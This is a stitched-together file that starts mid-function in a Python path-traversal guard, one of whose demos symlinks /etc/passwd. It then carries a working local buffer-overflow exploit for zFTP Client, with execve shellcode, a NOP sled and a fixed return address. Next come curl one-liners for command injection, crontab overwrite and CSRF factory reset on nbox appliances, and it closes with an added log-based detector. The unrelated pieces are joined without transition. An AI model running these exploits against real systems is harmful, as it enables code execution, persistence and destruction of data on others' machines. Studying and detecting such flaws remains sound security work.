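        raise TraversalError("absolute paths are not accepted: %r" % requested)
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise TraversalError("path escapes the web root: %r" % requested)
    return candidate


def is_allowed(root, requested):
    """Boolean wrapper around resolve_within_root()."""
    try:
        resolve_within_root(root, requested)
        return True
    except TraversalError:
        return False


def demo():
    """Build a throwaway web root (constructed, not the real application)
    holding one page and one symlink that points out of the root, then
    try the benign request and three escape attempts."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html></html>")
    os.symlink("/etc/passwd", os.path.join(root, "escape"))
    return {
        "index.html": is_allowed(root, "index.html"),
        "../../etc/passwd": is_allowed(root, "../../etc/passwd"),
        "/etc/passwd": is_allowed(root, "/etc/passwd"),
        "escape": is_allowed(root, "escape"),
    }
```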
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# jsacco@exploitpack.com
# Program affected: zFTP Client
# Affected value: NAME under FTP connection
# Where in the code: Line 30 in strcpy_chk.c
# __strcpy_chk (dest=0xb7f811c0 <cdf_value> "/KUIP", src=0xb76a6680 "/MACRO", destlen=0x50) at strcpy_chk.c:30
# Version: 20061220+dfsg3-4.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ZFTP is a macro-extensible file transfer program which supports the
# transfer of formatted, unformatted and ZEBRA RZ files
# Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb
# MD5sum: 524217187d28e4444d6c437ddd37e4de
# Website: http://cernlib.web.cern.ch/cernlib/
#
# gdb$ run `python -c 'print "A"*30'`
# Starting program: /usr/bin/zftp `python -c 'print "A"*30'`
# *** buffer overflow detected ***: /usr/bin/zftp terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb6fd1773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7061b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb705fc3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb705f127]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup+0x1a4)[0xb7417864]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup_+0x24)[0xb7418604]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(czopen_+0xd4)[0xb73f6d14]
# /usr/bin/zftp[0x804dc9b]
# Python 2 code (str is bytes here, which the raw shellcode relies on)
import errno
import subprocess
import sys


def run():
    try:
        print("# zFTP Client - Local Buffer Overflow by Juan Sacco")
        print("# This Exploit has been developed using Exploit Pack - http://exploitpack.com")
        # Buffer layout: NOPSLED + SHELLCODE + EIP
        buffersize = 100
        # execve("/bin//sh") shellcode, as in the original
        shellcode = ("\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53"
                     "\x89\xe1\x99\xb0\x0b\xcd\x80")
        # hard-coded little-endian return address from the original
        eip = "\x40\xf3\xff\xbf"
        # pad with NOPs so that sled + shellcode fill buffersize, then EIP
        nopsled = "\x90" * (buffersize - len(shellcode))
        buffer = nopsled + shellcode + eip
        # the overflowing value is passed as the first argument, as in the
        # gdb session above
        subprocess.call(["zftp", buffer])
    except OSError as e:
        if e.errno == errno.ENOENT:
            print("Sorry, zFTP client- Not found!")
        else:
            print("Error executing exploit")
            raise


def howtousage():
    print("Snap! Something went wrong")
    sys.exit(-1)


if __name__ == '__main__':
    try:
        print("Exploit zFTP Client - Local Overflow Exploit")
        print("Author: Juan Sacco - Exploit Pack")
    except IndexError:
        howtousage()
    run()
E-DB Note: Source ~ http://carnal0wnage.attackresearch.com/2016/08/got-any-rces.html
(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)
To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)
https://github.com/javuto/nbox-pwnage
*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:
RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK
curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'
RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;
curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'
RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'
RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'
RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200
curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'
There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:
GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'
The last one is a CSRF that leaves the machine fried, by resetting the machine completely:
GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'
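The injection points above all sit in parameters of /ntop-bin/*.cgi scripts, so the appliance's web server log is a natural place to look for them. The following is an added detection example, not part of the post or of nbox: it parses constructed Apache combined-format lines (only the GET variants show up there, since access logs carry no POST bodies), flags shell metacharacters in the percent-decoded parameter values, and records every hit on the two state-changing endpoints together with its Referer.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format; not real nbox logs.
# Lines 1, 2 and 4 replay GET requests quoted in the post, line 3 is a
# normal graph request and line 5 is the factory-reset hit with no Referer.
SAMPLE_LOG = """\
10.0.0.5 - nbox [16/Aug/2016:10:01:02 +0000] "GET /ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap HTTP/1.1" 200 512 "-" "curl/7.47.0"
10.0.0.5 - nbox [16/Aug/2016:10:01:03 +0000] "GET /ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22 HTTP/1.1" 200 88 "-" "curl/7.47.0"
10.0.0.9 - nbox [16/Aug/2016:10:02:10 +0000] "GET /ntop-bin/rrd_net_graph.cgi?interface=eth0 HTTP/1.1" 200 4096 "https://nbox/" "Mozilla/5.0"
10.0.0.5 - nbox [16/Aug/2016:10:03:00 +0000] "GET /ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON HTTP/1.1" 200 10 "-" "curl/7.47.0"
10.0.0.9 - nbox [16/Aug/2016:10:04:00 +0000] "GET /ntop-bin/do_factory_reset.cgi HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Characters that should never reach a shell from a CGI parameter value.
SHELL_META = re.compile(r'[;|`<>]|\$\(')
# State-changing endpoints from the post: log every hit; no Referer fits the CSRF case.
STATE_CHANGING = {"/ntop-bin/do_crontab.cgi", "/ntop-bin/do_factory_reset.cgi"}


def analyse_line(line):
    """Return a list of (rule, path, param, value) findings for one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/ntop-bin/"):
        return []
    findings = []
    # parse_qsl percent-decodes, so '%3E' is inspected as '>'.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SHELL_META.search(value):
            findings.append(("shell-metachar", parts.path, name, value))
    if parts.path in STATE_CHANGING:
        findings.append(("state-change", parts.path, "referer", m.group("referer")))
    return findings


def analyse_log(text):
    """Map 1-based line number -> findings, for lines that produced any."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        found = analyse_line(line)
        if found:
            report[n] = found
    return report
```

The POST bodies sent to write_conf_users.cgi, rrd_net_graph.cgi and do_mergecap.cgi never reach an access log; the same value check applied at a reverse proxy or WAF that sees the body covers those.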
Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...
If you have any questions or feedback, hit me up on twitter (@javutin)!
Have a nice day!